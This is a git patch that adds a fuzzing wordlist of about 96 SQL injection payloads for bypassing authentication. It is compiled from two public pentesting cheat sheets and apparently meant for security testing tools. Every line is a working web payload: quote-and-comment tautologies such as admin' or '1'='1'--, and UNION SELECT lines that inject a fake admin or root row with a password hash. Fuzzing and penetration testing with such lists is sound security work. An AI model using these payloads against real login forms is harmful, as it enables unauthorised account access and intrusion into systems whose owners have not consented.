From 6757058b8c85fbb0ce083d9d0ebf47118f33d92e Mon Sep 17 00:00:00 2001
From: sheimo <4674944+sheimo@users.noreply.github.com>
Date: Thu, 11 Jun 2020 23:24:34 -0500
Subject: [PATCH] Create sqli.auth.bypass.txt

This is a thorough SQL injection authentication bypass list. Each source below was combined to a text file and sorted.

Source: https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
Source: http://www.lifeoverpentest.com/2018/03/sql-injection-login-bypass-cheat-sheet.html
---
 Fuzzing/Databases/sqli.auth.bypass.txt | 96 ++++++++++++++++++++++++++
 1 file changed, 96 insertions(+)
 create mode 100644 Fuzzing/Databases/sqli.auth.bypass.txt

diff --git a/Fuzzing/Databases/sqli.auth.bypass.txt b/Fuzzing/Databases/sqli.auth.bypass.txt
new file mode 100644
index 00000000..98709ac7
--- /dev/null
+++ b/Fuzzing/Databases/sqli.auth.bypass.txt
@@ -0,0 +1,96 @@
+" or 1=1
+" or 1=1#
+" or 1=1--
+" or 1=1/*
+' or 1=1
+' or 1=1#
+' or 1=1--
+' or 1=1/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
+1234 " AND 1=0 UNION ALL SELECT "root", "81dc9bdb52d04dc20036dbd8313ed055
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
+admin" #
+admin" --
+admin" or "1"="1
+admin" or "1"="1"#
+admin" or "1"="1"--
+admin" or "1"="1"/*
+admin" or 1=1
+admin" or 1=1#
+admin" or 1=1--
+admin" or 1=1/*
+admin") or "1"="1
+admin") or "1"="1"#
+admin") or "1"="1"--
+admin") or "1"="1"/*
+admin") or ("1"="1
+admin") or ("1"="1"#
+admin") or ("1"="1"--
+admin") or ("1"="1"/*
+admin"/*
+admin"or 1=1 or ""="
+admin' #
+admin' --
+admin' or '1'='1
+admin' or '1'='1'#
+admin' or '1'='1'--
+admin' or '1'='1'/*
+admin' or 1=1
+admin' or 1=1#
+admin' or 1=1--
+admin' or 1=1/*
+admin') or '1'='1
+admin') or '1'='1'#
+admin') or '1'='1'--
+admin') or '1'='1'/*
+admin') or ('1'='1
+admin') or ('1'='1'#
+admin') or ('1'='1'--
+admin') or ('1'='1'/*
+admin'/*
+admin'or 1=1 or ''='
+or 1=1
+or 1=1#
+or 1=1--
+or 1=1/*
+root" #
+root" --
+root" or "1"="1
+root" or "1"="1"#
+root" or "1"="1"--
+root" or "1"="1"/*
+root" or 1=1
+root" or 1=1 or ""="
+root" or 1=1#
+root" or 1=1--
+root" or 1=1/*
+root") or "1"="1
+root") or "1"="1"#
+root") or "1"="1"--
+root") or "1"="1"/*
+root") or ("1"="1
+root") or ("1"="1"#
+root") or ("1"="1"--
+root") or ("1"="1"/*
+root"/*
+root' #
+root' --
+root' or '1'='1
+root' or '1'='1'#
+root' or '1'='1'--
+root' or '1'='1'/*
+root' or 1=1
+root' or 1=1#
+root' or 1=1--
+root' or 1=1/*
+root') or '1'='1
+root') or '1'='1'#
+root') or '1'='1'--
+root') or '1'='1'/*
+root') or ('1'='1
+root') or ('1'='1'#
+root') or ('1'='1'--
+root') or ('1'='1'/*
+root'/*
+root'or 1=1 or ''='